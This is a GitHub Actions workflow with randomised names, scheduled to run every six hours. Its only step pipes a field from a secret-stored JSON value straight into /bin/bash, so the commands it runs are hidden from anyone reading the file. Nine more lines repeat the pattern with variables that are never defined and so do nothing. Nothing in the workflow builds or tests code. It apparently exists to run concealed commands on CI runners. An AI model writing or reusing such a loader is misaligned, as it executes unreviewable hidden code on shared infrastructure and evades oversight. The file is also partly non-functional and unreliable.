name: yebawang8765

on:
  workflow_dispatch:
  schedule:
    - cron: '8 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yebawang8765
        env:
          wbo60300: ${{ secrets.wbo60300 }}
        run: |
          echo $wbo60300 | jq -r .btnpl012 | /bin/bash
          echo $wiudx2998 | jq -r .ysdp234 | /bin/bash
          echo $kb7 | jq -r .qiqf6278 | /bin/bash
          echo $d5 | jq -r .re3608 | /bin/bash
          echo $jfffg29 | jq -r .r7 | /bin/bash
          echo $xq08 | jq -r .bxum9684 | /bin/bash
          echo $qidi2 | jq -r .lc5 | /bin/bash
          echo $smqur1063 | jq -r .uzemc633 | /bin/bash
          echo $vw32 | jq -r .uaso141 | /bin/bash
          echo $c7874 | jq -r .jiyus297 | /bin/bash

